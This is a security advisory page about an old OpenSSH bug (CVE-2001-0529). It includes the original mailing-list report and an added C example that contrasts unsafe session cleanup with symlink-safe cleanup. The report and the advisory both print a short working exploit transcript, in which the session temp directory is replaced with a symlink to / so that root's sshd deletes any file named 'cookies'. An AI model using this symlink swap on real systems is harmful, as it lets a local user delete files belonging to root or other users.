SecurityTracker.com
Category:   Application (Security)  >   OpenSSH
Vendors:   OpenSSH.org
OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
SecurityTracker Alert ID:  1001683
SecurityTracker URL:  http://securitytracker.com/id/1001683
CVE Reference:   CVE-2001-0529   (Links to External Site)
Updated:  Apr 26 2004
Original Entry Date:  Jun 5 2001
Impact:   Denial of service via local system, Modification of system information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): openssh-server-2.5.2p2-1.7.2
Description:   A vulnerability has been reported in OpenSSH that allows an authorized (logged-in) user to delete a file named "cookies" in any directory on the file system, regardless of who owns it. At the end of a session, sshd (running as root) removes the "cookies" file from the per-session temporary directory /tmp/ssh-XXXXXXXX that it created for the session's X11 forwarding authentication data. The removal is done by path, with no check that the directory is still the real directory sshd created, so a user who deletes the directory and puts a symbolic link in its place redirects the unlink to <link target>/cookies.

A transcript of an exploit scenario is provided below:

[root@clarity /root]# touch /cookies;ls /cookies
/cookies
[root@clarity /root]# ssh zen@localhost
zen@localhost's password:
Last login: Mon Jun 4 20:22:39 2001 from localhost.local
Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
[zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
[zen@clarity zen]$ logout
Connection to localhost closed.
[root@clarity /root]# ls /cookies
/bin/ls: /cookies: No such file or directory

The OpenSSH vendor (www.openssh.org) has reportedly created a patch to address this issue.
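The cleanup pattern behind this advisory, as an added example that is neither OpenSSH's code nor part of zen-parse's report: a naive "remove <sessdir>/cookies" routine beside a symlink-safe one, both exercised against a constructed directory tree that reproduces the step from the transcript above (delete the session directory, put a symbolic link in its place). The directory names, the outcome struct and the return-code convention are the example's own, and nothing here runs as root: the redirect does not depend on privilege, only the reach of the deleted file does.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Naive session cleanup, an illustration of the pattern behind this advisory
 * (not OpenSSH's own code): it trusts the path. If the user has swapped the
 * directory for a symlink, unlink() follows it and removes <target>/cookies. */
int cleanup_naive(const char *sessdir)
{
    char path[512];
    snprintf(path, sizeof path, "%s/cookies", sessdir);
    if (unlink(path) != 0)
        return -1;
    (void)rmdir(sessdir);      /* fails harmlessly when sessdir is a link */
    return 0;
}

/* Hardened cleanup: open the directory itself with O_NOFOLLOW (a symlink makes
 * open() fail with ELOOP), confirm with fstat() that it is a real directory
 * owned by the expected user and closed to group/other, then delete relative
 * to that descriptor so the path cannot be re-pointed between check and use.
 * Returns 0 on success, -1 if the directory is missing or a link, -2 if it
 * fails the ownership/mode check, -3 if the cookie file cannot be removed. */
int cleanup_safe(const char *sessdir, uid_t expected_owner)
{
    struct stat st;
    int rc = -3;
    int dfd = open(sessdir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (dfd < 0)
        return -1;
    if (fstat(dfd, &st) != 0 || !S_ISDIR(st.st_mode) ||
        st.st_uid != expected_owner || (st.st_mode & (S_IRWXG | S_IRWXO)) != 0) {
        close(dfd);
        return -2;
    }
    if (unlinkat(dfd, "cookies", 0) == 0) {
        (void)rmdir(sessdir);  /* rmdir() never follows a symlink */
        rc = 0;
    }
    close(dfd);
    return rc;
}

/* Result of one constructed scenario, see run_scenario(). */
struct outcome {
    int setup_ok;        /* 0 if the scenario could not be built */
    int cleanup_rc;      /* return code of the cleanup routine that ran */
    int victim_deleted;  /* 1 if <victim>/cookies, outside the session dir, is gone */
    int session_deleted; /* 1 if the legitimate <sessdir>/cookies is gone; -1 = n/a */
};

static int gone(const char *p) { struct stat st; return lstat(p, &st) != 0; }

/* Build a private tree (constructed data, not a real sshd session): a victim
 * directory holding "cookies" and a session directory "ssh-XXW9hNY9" holding
 * its own "cookies". With attacker_swaps_dir set, do the transcript's step
 * (remove the session dir, symlink the victim dir in its place), then run the
 * chosen cleanup as the current user and report what got deleted. */
struct outcome run_scenario(int hardened, int attacker_swaps_dir)
{
    struct outcome o = {0, 0, 0, -1};
    const char *tmp = getenv("TMPDIR") ? getenv("TMPDIR") : "/tmp";
    char base[256], victim[300], victim_cookie[320], sess[300], sess_cookie[320];
    FILE *f;

    snprintf(base, sizeof base, "%s/cookiedemo-%ld-%d%d", tmp, (long)getpid(),
             hardened, attacker_swaps_dir);
    snprintf(victim, sizeof victim, "%s/victim", base);
    snprintf(victim_cookie, sizeof victim_cookie, "%s/cookies", victim);
    snprintf(sess, sizeof sess, "%s/ssh-XXW9hNY9", base);
    snprintf(sess_cookie, sizeof sess_cookie, "%s/cookies", sess);

    if (mkdir(base, 0700) == 0 && mkdir(victim, 0700) == 0 && mkdir(sess, 0700) == 0 &&
        (f = fopen(victim_cookie, "w")) != NULL && fclose(f) == 0 &&
        (f = fopen(sess_cookie, "w")) != NULL && fclose(f) == 0) {
        if (!attacker_swaps_dir ||
            (unlink(sess_cookie) == 0 && rmdir(sess) == 0 && symlink(victim, sess) == 0))
            o.setup_ok = 1;
    }
    if (o.setup_ok) {
        o.cleanup_rc = hardened ? cleanup_safe(sess, getuid()) : cleanup_naive(sess);
        o.victim_deleted = gone(victim_cookie);
        if (!attacker_swaps_dir)
            o.session_deleted = gone(sess_cookie);
    }
    /* Best-effort teardown; each call fails harmlessly when not applicable. */
    (void)unlink(victim_cookie); (void)unlink(sess_cookie);
    (void)rmdir(sess); (void)unlink(sess); (void)rmdir(victim); (void)rmdir(base);
    return o;
}

int main(void)
{
    struct outcome a = run_scenario(0, 1), b = run_scenario(1, 1), c = run_scenario(1, 0);
    printf("naive, dir swapped for link:    rc=%d victim cookies deleted=%d\n", a.cleanup_rc, a.victim_deleted);
    printf("hardened, dir swapped for link: rc=%d victim cookies deleted=%d\n", b.cleanup_rc, b.victim_deleted);
    printf("hardened, honest session dir:   rc=%d session cookies deleted=%d\n", c.cleanup_rc, c.session_deleted);
    return 0;
}
```

The point of the hardened routine is that every decision is made on the directory descriptor, not on the path: O_NOFOLLOW stops the swap shown in the transcript, the fstat() checks stop a directory the user has replaced with one of their own, and unlinkat() removes the file inside the directory that was actually opened. Run as a privileged daemon, the ownership check should name the session's user rather than getuid(); the example uses getuid() only because it runs as a single uid.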

Impact:   A local user can delete a file named "cookies" in any directory on the file system, including directories and files owned by root or by other users, by pointing the replaced session directory at that directory with a symbolic link. Only files with that exact name can be targeted.
Solution:   The OpenSSH vendor (www.openssh.org) has reportedly created a patch for OpenSSH to address this issue.
Vendor URL:  www.openssh.org/ (Links to External Site)
Cause:   Access control error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Additional Information is Provided) Re: OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies   (<zen-parse@gmx.net>)
The author of the original report provides additional information about the version that was tested.
(Vulnerability Cause is Provided) Re: OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies   (sarnold@wirex.com)
A user provides information on the cause of the vulnerability.
(Caldera Issues Fix) OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies   (Support Info <supinfo@caldera.com>)
The vendor has released a fix.
(NetBSD Releases Fix) Re: OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies   (NetBSD Security Officer <security-officer@netbsd.org>)
A fix is available for NetBSD.
(Immunix Issues Fix) OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies   (Immunix Security Team <security@wirex.com>)
The vendor has released a fix.



 Source Message Contents

Date:  Mon, 4 Jun 2001 22:14:29 +1200 (NZST)
Subject:  SSH allows deletion of other users files...


SSH allows deletion of other users files.
=========================================

You can delete any file on the filesystem you want...

as long as it's called cookies.


Not really a very useful bug, but could cause annoyances to
people who actually like their cookies.

 /home/zen/.netscape/cookies

sample exploit:-

 [root@clarity /root]# touch /cookies;ls /cookies
 /cookies
 [root@clarity /root]# ssh zen@localhost
 zen@localhost's password:
 Last login: Mon Jun  4 20:22:39 2001 from localhost.local
 Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
 [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
 [zen@clarity zen]$ logout
 Connection to localhost closed.
 [root@clarity /root]# ls /cookies
 /bin/ls: /cookies: No such file or directory


--zen-parse

Copyright 2013, SecurityGlobal.net LLC